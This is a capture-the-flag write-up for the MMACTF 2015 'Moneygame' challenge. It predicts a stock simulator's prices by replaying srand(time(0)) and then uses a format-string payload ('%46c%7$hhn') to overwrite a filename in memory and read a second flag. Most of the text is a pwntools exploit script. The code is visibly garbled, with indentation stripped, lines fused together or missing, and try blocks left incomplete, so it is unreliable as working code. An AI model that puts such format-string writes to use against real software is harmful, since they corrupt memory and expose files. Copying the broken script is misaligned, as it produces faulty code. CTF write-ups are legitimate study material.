MMACTF 2015 - Moneygame
We are presented with a stock market game. We have to time the market just right in order to get 10x our initial cash pile. Psh.. easy peasy
Week #1:
You have $10000.00!
Stock #1: $100.00 (You have 0.)
Stock #2: $100.00 (You have 0.)
Stock #3: $100.00 (You have 0.)
Action (Buy/Sell/Rest) [Rest] : Buy
Which stock do you want to buy? (1-3) [1]: 1
How many stocks do you want to buy? (0-100) [0]: 100
Week #2:
You have $0.00!
Stock #1: $103.16 (You have 100.)
Stock #2: $91.44 (You have 0.)
Stock #3: $92.64 (You have 0.)
Action (Buy/Sell/Rest) [Rest] :
Taking a look at the binary, we see that the numbers are generated from an srand(time(0))
. This is great for us, since we can create the same random number sequence on our end, thus negating the “random” factor of the stocks.
Quick aside
There is a print function that clears the screen in the binary. This only allowed for one week of stocks to be seen at one time. This was quite annoying for debugging. Let’s remove that functionality by patching over a call to printf()
. Patching over it is a breeze with binjitsu.
from pwn import *
elf = ELF('moneygame')
# NOP out annoying print that clears screen
# call printf is 5 bytes
for addr in (0x80487b3, 0x80487b8):
elf.asm(addr, 'nop')'moneygame-patched')
Now, moneygame-patched
can use used locally without the annoying screen clear. Now to the actual write-up
Flag 1
With the help of Python’s ctypes, generating random numbers on our end is trivial:
from ctypes import CDLL
libc = CDLL('')
# Seed srand with time(0)
now = int(floor(time.time()))
random_num = libc.rand()
From here, we replicate the same function that creates the stocks from the binary in Python:
def set_stocks():
'''Create stocks based on current srand'''
for index in xrange(1, 4):
for _ in xrange(54):
for index in xrange(1, 4):
curr_stock = stocks[index][-1]
# Use of libc's rand in Python
curr_stock += libc.rand() % 2001 - 1000
if curr_stock <= 4999:
curr_stock = 5000
if curr_stock > 15000:
curr_stock = 15000
Now that we have our three stock listings, we have to determine the optimal buy/sell path to success.
The quick and dirty method I used is described below:
- Calculate the peaks and valleys of each stock listings
- Calculate the largest profit margins for each stock using the peaks and valleys
- Sort all profit margins together
- Attempt to fill the 54 weeks based on the profit margins
An example of the last step of this simple algorithm is below:
The top three profit margins:
[4, 6, 100, '1'] Stock 1 from week 4 to 6 yields 100
[7, 9, 80, '3'] Stock 3 from week 7 to 9 yields 80
[1, 5, 50, '2'] Stock 2 from week 1 to 5 yields 100
Starting with the most profitable, fill in our available actions:
[4, 6, 100, '1'] Stock 1 from week 4 to 6 yields 100
Actions: ['', '', '', '', 'Buy stock1', 'Rest', 'Sell stock1', '', '', '']
Second most profitable:
[7, 9, 80, '3'] Stock 3 from week 7 to 9 yields 80
Actions: ['', '', '', '', 'Buy stock1', 'Rest', 'Sell stock1', 'Buy stock3', 'Rest', 'Sell stock3']
Our third most profitable overlaps and existing range i.e. the [4, 6, 100, ‘1’]. In this case, fill as much as we can before the start of the existing range. Note: This is not optimal. Bigger improvements can be made, but are not necessary.
[1, 5, 50, '2']
# Note: 1 - 5 overlaps into existing 4 - 6, Try to go as far as we can before selling.
Actions: ['', 'Buy stock2', 'Rest', 'Sell stock2', 'Buy stock1', 'Rest', 'Sell stock1', 'Buy stock3', 'Rest', 'Sell stock3']
Now that we have our optimal actions, we simulate these actions in order to determine if the actions result in a bank of $100k. We don’t want to waste time with the server, if we know ahead of time that we can lose.
Once we determine that we can win, we simply throw our results at the server and retrieve the first flag.
Flag 2
There is a string format vulnerability in the name field of the high score after winning the game. After winning the game, the binary grabs the filename of the flag flag1
, reads the contents of the file, and returns the contents to the user. We are given that the second flag is named flag2
, so we can use the string format to simply change the filename from flag1
to flag2
# Located at offset 7 on the stack
# 0x804a2b4 = 'flag1'
# 0x804a2b8 = '1'
# '2' == 50
# Padding necessary -> 50 - 4 bytes of address = 46
Video Flag 1
Video Flag 2
Final Exploit
Calculate all of the peaks and valleys for each stock.
Sort the peaks by highest value.
Assign actions in order of most valuable peaks.
If while assigning an action is already taken, cut the profits there to preserve the higher pay.
from pwn import *
from collections import defaultdict
import time
from ctypes import CDLL
from math import floor
libc = CDLL('')
counter = 0
def set_stocks():
'''Create stocks based on current srand'''
for index in xrange(1, 4):
for _ in xrange(54):
for index in xrange(1, 4):
curr_stock = stocks[index][-1]
curr_stock += libc.rand() % 2001 - 1000
if curr_stock <= 4999:
curr_stock = 5000
if curr_stock > 15000:
curr_stock = 15000
def get_peaks(nums):
'''Determine the Peaks and Valleys in a given list of numbers
list of tuples containing:
Index of start of Peak
Index of end of Peak
Amount gained
>>> print get_peaks([0, 2, 3, 4, 2, 1, 5, 9, 2])
[('Peak', 0, 3, 4), ('Peak', 5, 8, 1)]
start = nums[0]
points = [('start', start, 0)]
looking_for = ''
curr = start
for index,num in enumerate(nums[1:]):
if not looking_for:
if num < curr:
looking_for = 'Valley'
looking_for = 'Peak'
if index == (len(nums)-2):
last_value_index = points[-1][2]
last_value = abs(nums[last_value_index]-num)
points.append((looking_for, last_value_index, index+1, last_value))
elif looking_for == 'Valley':
if num > curr:
last_value_index = points[-1][2]
last_value = abs(nums[last_value_index]-curr)
points.append(('Valley', last_value_index, index, last_value))
looking_for = 'Peak'
elif looking_for == 'Peak':
if num < curr:
last_value_index = points[-1][2]
last_value = abs(nums[last_value_index]-curr)
points.append(('Peak', last_value_index, index, last_value))
looking_for = 'Valley'
curr = num
peaks = [item for item in points if item[0] == 'Peak']
return peaks
def send_action(action):
'''Given a tuple action, send it to the server'''
print r.readuntil('$')
cash = r.readuntil('!')[:-1]
r.readuntil('#1: $')
stock1 = r.readuntil(' (').split()[0]
r.readuntil('#2: $')
stock2 = r.readuntil(' (').split()[0]
r.readuntil('#3: $')
stock3 = r.readuntil(' (').split()[0]"Cash: {}".format(cash))"Stock 1: {}".format(stock1))"Stock 2: {}".format(stock2))"Stock 3: {}".format(stock3))"Action: {}".format(action))
command, stock = action
if command == 'Rest':
# r.sendline(stock)
print r.recvuntil('-')
print r.recvuntil('-')
max_num = r.recvuntil(')')[:-1]"Max number: {}".format(max_num))
def check_win():
'''Before interacting with the server, simulate if we can win in order to save time'''
money = 10000
for index, action in enumerate(final):
action, stock = action
if stock == '0':
stock = {'1': stock1,
'2': stock2,
'3': stock3}[stock]
if action == "Buy":
stock_price = stock[index] * 0.01
number_of_stocks = int(money / stock_price)
money -= (number_of_stocks * stock_price)
if action == "Sell":
stock_price = stock[index] * 0.01
money += (number_of_stocks * stock_price)
print action, money, number_of_stocks
if money > 99999:
return True
return False
while True:
Loop until the random number generator is in our favor
r = remote('', 21345)
# r = process('./moneygame-patched')
# Seed srand with time(0)
now = int(floor(time.time()))
# Initializers
stocks = defaultdict(list)
moves = []
# Initialize stocks from known seeded random
# Grab our 3 stock lists
stock1 = stocks[1]
stock2 = stocks[2]
stock3 = stocks[3]
# Grab the largest profits (Peaks) from each stock set
peaks = [list(item) + ['1'] for item in get_peaks(stock1)]
peaks += [list(item) + ['2'] for item in get_peaks(stock2)]
peaks += [list(item) + ['3'] for item in get_peaks(stock3)]
# Order all profits from the three stocks by potential profit
peaks = sorted(peaks, key=lambda x: x[3])[::-1]
actions = [''] * 54
# print actions
From the profits list, we will try and fill in all available actions.
Starting from the most profitable peaks, attempt to block time off for that stock.
If lower profit range overlaps an existing higher profit range, cut the lower profit range short.
[4, 6, 100, '1'], [7, 9, 80, '3'], [1, 5, 50, '2']
[4, 6, 100, '1']
Actions: ['', '', '', '', 'Buy stock1', 'Rest', 'Sell stock1', '', '', '']
[7, 9, 80, '3']
Actions: ['', '', '', '', 'Buy stock1', 'Rest', 'Sell stock1', 'Buy stock3', 'Rest', 'Sell stock3']
[1, 5, 50, '2']
# Note: 1 - 5 overlaps into existing 4 - 6, Try to go as far as we can before selling.
Actions: ['', 'Buy stock2', 'Rest', 'Sell stock2', 'Buy stock1', 'Rest', 'Sell stock1', 'Buy stock3', 'Rest', 'Sell stock3']
for peak in peaks:
_, start, stop, _, stock_num = peak
# Action already happening on this day, don't overwrite it
# Also, don't try to start anything with only one empty slot
if actions[start] or actions[start+1]:
actions[start] = ('Buy', str(stock_num))
for index in xrange(start+1, stop+1):
if actions[index]:
actions[index-1] = ('Sell', str(stock_num))
actions[index] = ('Rest', str(stock_num))
except IndexError:
# We were not interrupted and need to sale these stocks
actions[stop] = ('Sell', str(stock_num))
except IndexError:
actions[stop-1] = ('Sell', str(stock_num))
final = []
for action in actions:
if not action:
final.append(('Rest', '0'))
stocks = defaultdict(list)
# Don't continue unless we know we can win
if not check_win():
for move in final:
except Exception as e:
# Name - Flag 1
# Name - Flag 2
shellcode = p32(0x804a2b8) + '%46c%7$hhn'
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